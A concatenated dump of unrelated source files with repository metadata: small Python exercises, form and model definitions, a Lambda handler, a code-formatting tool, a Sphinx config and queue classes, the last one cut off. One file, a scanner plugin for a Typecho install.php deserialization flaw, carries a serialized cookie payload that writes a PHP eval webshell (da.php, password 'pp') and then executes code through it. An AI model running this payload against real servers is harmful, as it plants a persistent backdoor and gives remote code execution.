|
1d4a814e2190852e8387ad1a5acc052de015b9a0
|
9907672fcd81ab73ac63b2a83422a82bf31eadde
|
/hackerrank/punctuation-corrector-its.py
|
f3595458821fabfefedcbda7b611ad3230426d7b
|
[
"0BSD"
] |
permissive
|
cielavenir/procon
|
bbe1974b9bddb51b76d58722a0686a5b477c4456
|
746e1a91f574f20647e8aaaac0d9e6173f741176
|
refs/heads/master
| 2023-06-21T23:11:24.562546
| 2023-06-11T13:15:15
| 2023-06-11T13:15:15
| 7,557,464
| 137
| 136
| null | 2020-10-20T09:35:52
| 2013-01-11T09:40:26
|
C++
|
UTF-8
|
Python
| false
| false
| 234
|
py
|
#!/usr/bin/python
#coding:utf-8
# HackerRank "Punctuation Corrector (its/It's)": each input line contains
# the placeholder "???"; print it as "It's" when it begins the line,
# otherwise as "its".
import sys
# Python 2/3 shim: make raw_input available under both interpreters.
if sys.version_info[0]>=3: raw_input=input
# First input line gives the number of test cases.
for i in range(int(raw_input())):
    s=raw_input().rstrip()
    if s[0:3]=='???':
        # Placeholder starts the sentence -> capitalized form.
        # NOTE(review): replace() substitutes EVERY ??? in the line with
        # the same form — confirm lines contain one placeholder each.
        print(s.replace('???',"It's"))
    else:
        print(s.replace('???','its'))
|
[
"cielartisan@gmail.com"
] |
cielartisan@gmail.com
|
64a1d271708de64b04bc1ae03232247c989b365d
|
fcbb60497db52eafc0ce5ff7e3ed65b7f6d4e42b
|
/05 decorators/contextlib_with1.py
|
5a95ae5b28d695e79753527fbca7ada6b50df61e
|
[] |
no_license
|
bambrikii/test-python-2
|
dfbd16dfd536fd2e841f39d004f0d499ed08ed09
|
12fac97a5e111abcf3be7cfbed141e4d1b7d0fa8
|
refs/heads/master
| 2020-03-27T06:41:03.654213
| 2016-11-20T18:52:21
| 2016-11-20T18:52:44
| 146,126,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
#!/bin/python
from __future__ import print_function
import contextlib
@contextlib.contextmanager
def open_context_manager(filename, mode="r"):
    """Context manager that opens *filename* and guarantees it is closed.

    Bug fix: the original closed the file only on a clean exit — if the
    body of the ``with`` block raised, the generator was abandoned at
    ``yield`` and the handle leaked.  ``try/finally`` closes the file on
    both the normal and the exceptional path (the pattern recommended by
    the contextlib documentation).
    """
    fh = open(filename, mode)
    try:
        yield fh
    finally:
        fh.close()
# Demo 1: the hand-written @contextmanager defined earlier in this file.
with open_context_manager("contextlib_with1-1.txt", "w") as fh:
    print('The test 1 is complete!', file=fh); # uses __future__.print_function.print. see imports
    fh.write('The test 1 is complete!')

# Demo 2: contextlib.closing() adapts any object exposing .close().
with contextlib.closing(open("contextlib_with1-2.txt", "w")) as fh:
    print('The test 2 is complete!', file=fh); # uses __future__.print_function.print. see imports
    fh.write('The test 2 is complete!');
|
[
"bambrikii@gmail.com"
] |
bambrikii@gmail.com
|
096663da95904bba3e537f0a95908b2c43e1ff77
|
9e40da51a8897562ce4e9fac4fd3076dde6f87af
|
/app/mod_auth/forms.py
|
69c2da533430c24fe9a657bdc19c5a0d417dcedc
|
[] |
no_license
|
Sanchit-Trivedi/nursery_management_project-1
|
01c92dfcc542c9a268dab8739d0798e7a66771e5
|
774cae522ae27726eda7966ca74273eea06adfbd
|
refs/heads/master
| 2022-11-13T23:54:32.740694
| 2020-07-07T21:29:45
| 2020-07-07T21:29:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
# Import Form and RecaptchaField (optional)
# , RecaptchaField
# Import Form elements such as TextField and BooleanField (optional)
# BooleanField
# Import Form validators
from wtforms.validators import Required, Email, EqualTo
from wtforms import TextField, Form, BooleanField, StringField, PasswordField, validators
from wtforms.fields.core import RadioField, SelectField
# Define the login form (WTForms)
class LoginForm(Form):
    """Login credentials: email address plus password."""

    # Bug fix: the original read ``email = email = StringField(...)`` — a
    # doubled assignment (typo) with no effect; now a single assignment.
    email = StringField('Email Address', [validators.Length(min=6, max=35), validators.DataRequired()])
    password = PasswordField('Password', [validators.DataRequired()])
class RegistrationForm(Form):
    """New-user signup form: name, email, double-entered password, role."""

    name = StringField('Name', [validators.Length(min=4, max=25), validators.DataRequired(),])
    email = StringField('Email Address', [validators.Length(min=6, max=35), validators.DataRequired(),])
    # Password must match the ``confirm`` field below.
    password = PasswordField('New Password', [
        validators.DataRequired(),
        validators.EqualTo('confirm', message='Passwords must match')
    ])
    confirm = PasswordField('Confirm Password')
    # Role is stored as the string value: '0' = Customer, '1' = Owner.
    role = SelectField('Role', choices=[('0','Customer'),('1','Owner')])
|
[
"nikunj18249@iiitd.ac.in"
] |
nikunj18249@iiitd.ac.in
|
3ab459e404bd2ac66d52f4c12ebd7653ecdeb7ed
|
727f1bc2205c88577b419cf0036c029b8c6f7766
|
/out-bin/py/google/fhir/models/run_locally.runfiles/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/text/python/ops/__init__.py
|
eba90bf6317a8929a63a56d0b1e0e601abd2b6aa
|
[
"Apache-2.0"
] |
permissive
|
rasalt/fhir
|
55cf78feed3596a3101b86f9e9bbf6652c6ed4ad
|
d49883cc4d4986e11ca66058d5a327691e6e048a
|
refs/heads/master
| 2020-04-13T00:16:54.050913
| 2019-01-15T14:22:15
| 2019-01-15T14:22:15
| 160,260,223
| 0
| 0
|
Apache-2.0
| 2018-12-03T22:07:01
| 2018-12-03T22:07:01
| null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
/home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/text/python/ops/__init__.py
|
[
"ruchika.kharwar@gmail.com"
] |
ruchika.kharwar@gmail.com
|
4638417263f9ca1124e3c02943f4dcd4fb9596f5
|
56c758efde4ed4037a47c1ea6143dd948be81a37
|
/lambda/Web/Web005/Web005.py
|
718e21fe806e1760e43472fd0460ed64eb83e065
|
[] |
no_license
|
umaxyon/pac-job
|
45bf06bffd2f434fb838f0272704f2f782174d0b
|
22bef2c2ea61184e25276859a4f93b3941053c9e
|
refs/heads/master
| 2023-02-27T04:06:29.268008
| 2021-02-10T04:23:36
| 2021-02-10T04:23:36
| 337,614,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
# -*- coding:utf-8 -*-
import os
from common.pacjson import JSON
from common.datetime_util import DateTimeUtil
from common.dao import Dao
from common.price_logic import PriceLogic
def response(body):
    """Wrap *body* as an API Gateway Lambda proxy response: HTTP 200,
    CORS enabled, caching disabled, body serialized with JSON.dumps."""
    payload = {
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {
            "Access-Control-Allow-Origin": "*",
            "Cache-Control": "no-cache"
        },
        "body": JSON.dumps(body)
    }
    return payload
def web005_handler(event, context):
    """Current-price API: return the latest prices for the codes listed
    (underscore-separated) in ``event['cds']``."""
    print(DateTimeUtil.str_now())
    os.environ["PRODUCTION_DAO"] = "True"  # TODO: for production-side testing — forces the production DAO
    dao = Dao()
    logic = PriceLogic()
    # Timestamp of the most recent price refresh.
    uptime = logic.get_now_price_update_time()
    cds = event['cds']
    print('cds = {}'.format(cds))
    cd_list = cds.split('_')
    # Batch lookup of current prices for every requested code.
    prices = dao.table("stock_price_now").find_batch(cd_list)
    return response({ "v": "1", "prices": prices, "now_price_uptime": uptime })
# Local smoke test: fetch prices for USD/JPY and codes 3936 and 8267.
if __name__ == '__main__':
    print(web005_handler({'cds': 'USDJPY_3936_8267'}, {}))
|
[
"umaxyon@gmail.com"
] |
umaxyon@gmail.com
|
0f8a80c93d8c3b668c311e6bcd30c6ab0ad43955
|
e17d9d944508b39e74243bf94c5fe34ccf81c99a
|
/tools/codeformat.py
|
f3efb5df75c620a3716d196593ab9f68bf43d760
|
[
"MIT"
] |
permissive
|
rlourette/micropython
|
9f3b4a0895c93f9dd8ae5fe83b92920d3db2d7da
|
dbaaed1697d22046e06a6f3f7ff9a1fbc1d73ee7
|
refs/heads/master
| 2021-02-14T13:11:23.909501
| 2020-03-18T00:07:19
| 2020-03-18T00:07:19
| 244,805,958
| 0
| 0
|
MIT
| 2020-03-04T04:19:58
| 2020-03-04T04:19:57
| null |
UTF-8
|
Python
| false
| false
| 6,006
|
py
|
#!/usr/bin/env python3
#
# This file is part of the MicroPython project, http://micropython.org/
#
# The MIT License (MIT)
#
# Copyright (c) 2020 Damien P. George
# Copyright (c) 2020 Jim Mussared
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import argparse
import fnmatch
import glob
import itertools
import os
import re
import subprocess
# Relative to top-level repo dir.
PATHS = [
    # C
    "extmod/*.[ch]",
    "lib/netutils/*.[ch]",
    "lib/timeutils/*.[ch]",
    "lib/utils/*.[ch]",
    "mpy-cross/*.[ch]",
    "ports/*/*.[ch]",
    "py/*.[ch]",
    # Python
    "drivers/**/*.py",
    "examples/**/*.py",
    "extmod/**/*.py",
    "ports/**/*.py",
    "py/**/*.py",
    "tools/**/*.py",
]
# Glob patterns removed from the matched set after expansion.
EXCLUSIONS = [
    # STM32 build includes generated Python code.
    "ports/*/build*",
    # gitignore in ports/unix ignores *.py, so also do it here.
    "ports/unix/*.py",
]
# Path to repo top-level dir.
TOP = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
# uncrustify config used for all C formatting.
UNCRUSTIFY_CFG = os.path.join(TOP, "tools/uncrustify.cfg")
# Extensions used to split the file list by language.
C_EXTS = (
    ".c",
    ".h",
)
PY_EXTS = (".py",)
# (compiled pattern, replacement) pairs applied to every line by fixup_c()
# to undo spacing quirks uncrustify introduces around sizeof.
FIXUP_REPLACEMENTS = (
    (re.compile("sizeof\(([a-z_]+)\) \*\(([a-z_]+)\)"), r"sizeof(\1) * (\2)"),
    (re.compile("([0-9]+) \*sizeof"), r"\1 * sizeof"),
)
def list_files(paths, exclusions=None, prefix=""):
    """Expand glob `paths` (relative to `prefix`) into a sorted file list.

    paths -- glob patterns; `**` recursion is enabled.
    exclusions -- optional fnmatch patterns removed from the result.
    prefix -- directory prepended to every pattern (default: cwd-relative).
    Returns a sorted list of matching paths (duplicates removed).
    """
    files = set()
    for pattern in paths:
        files.update(glob.glob(os.path.join(prefix, pattern), recursive=True))
    for pattern in exclusions or []:
        # Use the public fnmatch module directly rather than `glob.fnmatch`,
        # which only works because glob happens to import fnmatch internally.
        files.difference_update(fnmatch.filter(files, os.path.join(prefix, pattern)))
    return sorted(files)
def fixup_c(filename):
    """Post-process an uncrustify-formatted C file, in place.

    uncrustify indents `#if`-family preprocessor lines to match the
    *previous* code line; this pass re-aligns them with the *following*
    line (tracking nesting via `dedent_stack`) and then applies the
    FIXUP_REPLACEMENTS regexes to every line.
    """
    # Read file.
    with open(filename) as f:
        lines = f.readlines()
    # Write out file with fixups.
    with open(filename, "w", newline="") as f:
        # One entry per open #if/#ifdef/#ifndef: the dedent target column,
        # or -1 when that conditional needs no dedenting.
        dedent_stack = []
        while lines:
            # Get next line.
            l = lines.pop(0)
            # Dedent #'s to match indent of following line (not previous line).
            m = re.match(r"( +)#(if |ifdef |ifndef |elif |else|endif)", l)
            if m:
                indent = len(m.group(1))
                directive = m.group(2)
                if directive in ("if ", "ifdef ", "ifndef "):
                    l_next = lines[0]
                    indent_next = len(re.match(r"( *)", l_next).group(1))
                    if indent - 4 == indent_next and re.match(r" +(} else |case )", l_next):
                        # This #-line (and all associated ones) needs dedenting by 4 spaces.
                        l = l[4:]
                        dedent_stack.append(indent - 4)
                    else:
                        # This #-line does not need dedenting.
                        dedent_stack.append(-1)
                else:
                    # elif/else/endif inherit the decision made for their #if.
                    if dedent_stack[-1] >= 0:
                        # This associated #-line needs dedenting to match the #if.
                        indent_diff = indent - dedent_stack[-1]
                        assert indent_diff >= 0
                        l = l[indent_diff:]
                    if directive == "endif":
                        dedent_stack.pop()
            # Apply general regex-based fixups.
            for regex, replacement in FIXUP_REPLACEMENTS:
                l = regex.sub(replacement, l)
            # Write out line.
            f.write(l)
        # Every #if must have been closed by a matching #endif.
        assert not dedent_stack, filename
def main():
    """Parse options and run uncrustify (C) and/or black (Python) over the tree."""
    cmd_parser = argparse.ArgumentParser(description="Auto-format C and Python files.")
    cmd_parser.add_argument("-c", action="store_true", help="Format C code only")
    cmd_parser.add_argument("-p", action="store_true", help="Format Python code only")
    cmd_parser.add_argument("files", nargs="*", help="Run on specific globs")
    args = cmd_parser.parse_args()
    # Setting only one of -c or -p disables the other. If both or neither are set, then do both.
    format_c = args.c or not args.p
    format_py = args.p or not args.c
    # Expand the globs passed on the command line, or use the default globs above.
    files = []
    if args.files:
        files = list_files(args.files)
    else:
        files = list_files(PATHS, EXCLUSIONS, TOP)
    # Extract files matching a specific language.
    # Returns a fresh generator each call, so each batch()/loop below
    # consumes its own pass over `files`.
    def lang_files(exts):
        for file in files:
            if os.path.splitext(file)[1].lower() in exts:
                yield file
    # Run tool on N files at a time (to avoid making the command line too long).
    def batch(cmd, files, N=200):
        while True:
            file_args = list(itertools.islice(files, N))
            if not file_args:
                break
            subprocess.check_call(cmd + file_args)
    # Format C files with uncrustify.
    if format_c:
        batch(["uncrustify", "-c", UNCRUSTIFY_CFG, "-lC", "--no-backup"], lang_files(C_EXTS))
        # Second pass: repair the preprocessor indentation uncrustify mangles.
        for file in lang_files(C_EXTS):
            fixup_c(file)
    # Format Python files with black.
    if format_py:
        batch(["black", "-q", "--fast", "--line-length=99"], lang_files(PY_EXTS))
# Script entry point: `python tools/codeformat.py [-c|-p] [globs...]`.
if __name__ == "__main__":
    main()
|
[
"damien.p.george@gmail.com"
] |
damien.p.george@gmail.com
|
2544eeb4281cc5170bf4eb4b998c5a686d6703d3
|
8dd5a2ea25367f06dc1c7752fd22c5d7902cdd54
|
/ask/models.py
|
05dfda568b6d8a9415c0f10328b188b9c163d147
|
[] |
no_license
|
sng1996/DjangoProject
|
7b61f939bc9b1d2a1f8df1593a3946c10846431b
|
ca828e4c6ed179b7bf833f59057440fad5a06a9c
|
refs/heads/master
| 2021-01-20T19:56:38.877644
| 2016-06-12T00:44:32
| 2016-06-12T00:44:32
| 61,306,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,108
|
py
|
from django.db import models
from django.contrib.auth.models import User
import datetime
import MySQLdb
from PIL import Image
# Create your models here.
class QuestionQuerySet(models.QuerySet):
    """Chainable filters/orderings for Question."""
    def rating(self):
        # Highest-rated questions first.
        return self.order_by('-rating')
    def added(self):
        # Newest questions first.
        return self.order_by('-added_at')
    def tags(self, argv):
        # Questions carrying the tag named `argv` (reverse M2M from Tag).
        return self.filter(tag__name = argv)
    def question(self, question_id):
        # Single question by primary key; raises Question.DoesNotExist if absent.
        return self.get(id = int(question_id))
class QuestionManager(models.Manager):
    """Manager exposing QuestionQuerySet helpers as Question.questions.*."""
    def get_queryset(self):
        return QuestionQuerySet(self.model, using=self._db)
    def rating(self):
        return self.get_queryset().rating()
    def added(self):
        return self.get_queryset().added()
    def tags(self, argv):
        return self.get_queryset().tags(argv)
    def question(self, question_id):
        return self.get_queryset().question(question_id)
class Question(models.Model):
    """A posted question with rating, voters, and (reverse) tags."""
    title = models.CharField(max_length=128)
    body = models.TextField()
    # Callable default: timestamp taken at save time, not at import time.
    added_at = models.DateTimeField(default=datetime.datetime.now)
    author = models.ForeignKey(User)
    rating = models.IntegerField(default = 0)
    # Users who voted; the Like through-model records each vote's direction.
    votes = models.ManyToManyField(User, related_name='voted_users', through = 'Like')
    # Custom default manager — note it is named `questions`, not `objects`.
    questions = QuestionManager()
class AnswerQuerySet(models.QuerySet):
    """Chainable filters for Answer."""
    def answer(self, question_id):
        # All answers belonging to the given question.
        return self.filter(question__pk = int(question_id))
class AnswerManager(models.Manager):
    """Manager exposing AnswerQuerySet helpers as Answer.answers.*."""
    def get_queryset(self):
        return AnswerQuerySet(self.model, using=self._db)
    def answer(self,question_id):
        return self.get_queryset().answer(question_id)
class Answer(models.Model):
    """An answer posted to a Question."""
    text = models.TextField()
    author = models.ForeignKey(User)
    question = models.ForeignKey(Question)
    # Callable default: timestamp taken at save time.
    added_at = models.DateTimeField(default=datetime.datetime.now)
    # Custom default manager — named `answers`, not `objects`.
    answers = AnswerManager()
class Like(models.Model):
    """Through-model for Question.votes: one user's vote on one question."""
    user = models.ForeignKey(User)
    question = models.ForeignKey(Question)
    # Presumably True = upvote, False = downvote — confirm against the views.
    is_Like = models.BooleanField()
class Tag(models.Model):
    """A tag; `question` links it to every question carrying it."""
    name = models.CharField(max_length=32)
    rating = models.IntegerField(default = 0)
    question = models.ManyToManyField(Question)
class Profile(models.Model):
    """Extra per-user data (avatar), attached 1:1 to the auth User."""
    user = models.OneToOneField(User)
    avatar = models.ImageField()
|
[
"seregagavrilko@mail.ru"
] |
seregagavrilko@mail.ru
|
b42422ce5b50e86a6946a8365a3504f6f01362d7
|
df387dcd8815dc632b07d862d693d1f2453af939
|
/conf.py
|
c2223494bcf2900fdd34f1e7698ec9f58a774faf
|
[
"AFL-2.1",
"Python-2.0",
"MIT"
] |
permissive
|
sporty/simplejson
|
805d7b7b39576f16696d7039cc807bc7fc42b89c
|
3eaa8d54dfed8cd64c9f439451f5514f45cd4dd4
|
refs/heads/master
| 2021-01-20T22:02:42.749599
| 2014-07-21T07:33:51
| 2014-07-21T07:33:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,681
|
py
|
# -*- coding: utf-8 -*-
#
# simplejson documentation build configuration file, created by
# sphinx-quickstart on Fri Sep 26 18:58:30 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# No Sphinx extensions are needed for this project.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'simplejson'
copyright = '2014, Bob Ippolito'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# NOTE: both values below must be bumped together on each release.
# The short X.Y version.
version = '3.5'
# The full version, including alpha/beta/rc tags.
release = '3.5.3'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'simplejsondoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
  ('index', 'simplejson.tex', 'simplejson Documentation',
   'Bob Ippolito', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
[
"bob@redivi.com"
] |
bob@redivi.com
|
32f152b39e4dc9d912646e98e62dbdb51f4d2eb6
|
6eca0e7fe3978f666744c9bd6ea4d85cf234e0f4
|
/python/app/plugins/http/Typecho/Typecho_Install_Code_Exec.py
|
0e9738e06ab87419089b2e56d9f88b9fb48f87e5
|
[
"MIT"
] |
permissive
|
encore2005/linbing
|
1003459c803316754a86f640821ba237e3d4fb9b
|
46cb780479c6a6908e3ca6fb90d116434dd4d4ce
|
refs/heads/master
| 2023-09-05T16:05:36.668878
| 2021-11-27T15:49:15
| 2021-11-27T15:49:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,531
|
py
|
#!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class Typecho_Install_Code_Exec_BaseVerify:
    """PoC check for the Typecho 0.9–1.0 install.php deserialization RCE.

    The `__typecho_config` cookie carries a PHP-serialized payload; when
    install.php?finish=1 unserializes it, `file_put_contents` drops a
    one-line webshell (da.php, password `pp`) which the check then probes.
    NOTE: this is offensive tooling — only run against authorized targets.
    """
    def __init__(self, url):
        # Metadata consumed by the scanning framework (kept verbatim).
        self.info = {
            'name': 'typecho install.php反序列化命令执行漏洞',
            'description': 'typecho install.php反序列化命令执行漏洞,影响范围为: Typecho Typecho 0.9~1.0',
            'date': '2017-11-06',
            'exptype': 'check',
            'type': 'Serializable'
        }
        self.url = url
        if not self.url.startswith("http") and not self.url.startswith("https"):
            self.url = "http://" + self.url
        # Cookie holds the base64 PHP-serialized exploit payload; Referer is
        # required by install.php's own referrer check.
        self.headers = {
            "User-Agent": get_useragent(),
            "Cookie": "__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
            "Referer": self.url + "/install.php",
        }
    def check(self):
        """
        Probe the target and report whether it is vulnerable.

        GET install.php?finish=1 with the malicious cookie (drops da.php),
        then POST pp=phpinfo(); to da.php and look for phpinfo output.
        :return bool True or False: whether the vulnerability exists
        """
        try:
            check_url = self.url + "/install.php?finish=1"
            # Response body is not inspected; this request only triggers the payload.
            req = request.get(check_url, headers = self.headers)
            shellpath = self.url + "/da.php"
            post_data ={
                "pp":"phpinfo();"
            }
            check_req = request.post(self.url + "/da.php", data = post_data, headers = self.headers)
            # phpinfo() output proves the dropped shell executed our code.
            if r"Configuration File (php.ini) Path" in check_req.text:
                print("存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: " + check_url + "\tshell地址: " + shellpath + "\t密码: pp")
                return True
            else:
                return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass
# Ad-hoc manual test against a local target.
if __name__ == "__main__":
    Typecho_Install_Code_Exec = Typecho_Install_Code_Exec_BaseVerify('https://127.0.0.1')
    Typecho_Install_Code_Exec.check()
|
[
"taomujian@protonmail.com"
] |
taomujian@protonmail.com
|
da64379108d10ffcce480826867a05edd566bdd1
|
895f4befd11c8169f818d229e42bda9c18bdc15d
|
/thndr/api/withdraw.py
|
268400db656a291f7d52d5cfda257ce3c5af9fa0
|
[] |
no_license
|
MostafaMhmod/stocks-exchange-app
|
69fdd0d9ac6ed76537e70cf583ffb4503829cba2
|
0b7134b180cb75b37a3eb0234920da0d1f468019
|
refs/heads/master
| 2023-03-01T00:16:00.658957
| 2021-02-09T00:57:46
| 2021-02-09T00:57:46
| 336,931,433
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
from rest_framework.decorators import api_view
from rest_framework.response import Response
from thndr.serializers.transaction_serializer import TransactionWalletCreateSerializer
@api_view(["POST"])
def withdraw(request):
    """Record a wallet withdrawal.

    Expects a JSON body with `user_id` and `amount`.  Validation failures
    raise and produce a 400 response via DRF; on success returns
    {"success": true}.
    """
    data = {}
    data['user'] = request.data.get('user_id')
    data['amount'] = request.data.get('amount')
    # Mark the transaction direction explicitly for the serializer.
    data['withdraw'] = True
    data['deposit'] = False
    serializer = TransactionWalletCreateSerializer(data=data)
    serializer.is_valid(raise_exception=True)  # 400 on invalid input
    serializer.save()
    return Response({"success": True})
|
[
"moustafa.mahm@gmail.com"
] |
moustafa.mahm@gmail.com
|
2d745cb89d987b4929a5b6b26b7b4039b93fac08
|
ef2f632f814928ff8160c9afd11f55b9b5f4d216
|
/Algorithms/Implementations/my_queue.py
|
01da9166d27c3cd17a65bf9ec99378672fca339c
|
[] |
no_license
|
CBASoftwareDevolopment2020/Exam-Notes
|
319a4f2b445654d4fb56e27c1fb18a40aa0323a4
|
cfc8223377e9a5741a4272c0cd255bd9cae04f85
|
refs/heads/master
| 2022-09-27T22:43:40.757221
| 2020-05-29T11:19:02
| 2020-05-29T11:19:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,412
|
py
|
from utils import Node
class ArrayQueue:
    """FIFO queue backed by a plain Python list.

    The front of the queue is index 0, so enqueue is amortized O(1)
    while dequeue is O(n) (the list shifts after the front pop).
    """
    def __init__(self):
        self._items = []
        self._size = 0
    def enqueue(self, item):
        """Add `item` at the back of the queue."""
        self._size += 1
        self._items.append(item)
    def dequeue(self):
        """Remove and return the front item; IndexError when empty."""
        front = self._items.pop(0)
        self._size -= 1
        return front
    def is_empty(self):
        """Return True when the queue holds no items."""
        return not self._size
    def get_size(self):
        """Return the number of items currently queued."""
        return self._size
    def __iter__(self):
        """Iterate front-to-back over a snapshot of the items."""
        for item in self._items[:self._size]:
            yield item
class LinkedQueue:
    """FIFO queue over a linked chain of utils.Node objects.

    Both enqueue and dequeue are O(1).
    """
    def __init__(self):
        self._first = None  # front of the queue (dequeued first)
        self._last = None   # back of the queue (most recently enqueued)
        self._size = 0
        self._next = None   # iteration cursor used by __iter__/__next__
    def enqueue(self, item):
        """Append `item` at the back of the queue."""
        if self._last:
            # NOTE(review): assumes utils.Node(item, next, prev) argument
            # order — confirm against utils.Node's definition.
            new = Node(item, None, self._last)
            self._last.next, self._last = new, new
        else:
            # First element: it is both front and back.
            self._first = self._last = Node(item)
        self._size += 1
    def dequeue(self):
        """Remove and return the front item; AttributeError when empty."""
        item, self._first = self._first.item, self._first.next
        if self._first is None:
            self._last = None
        self._size -= 1
        return item
    def is_empty(self):
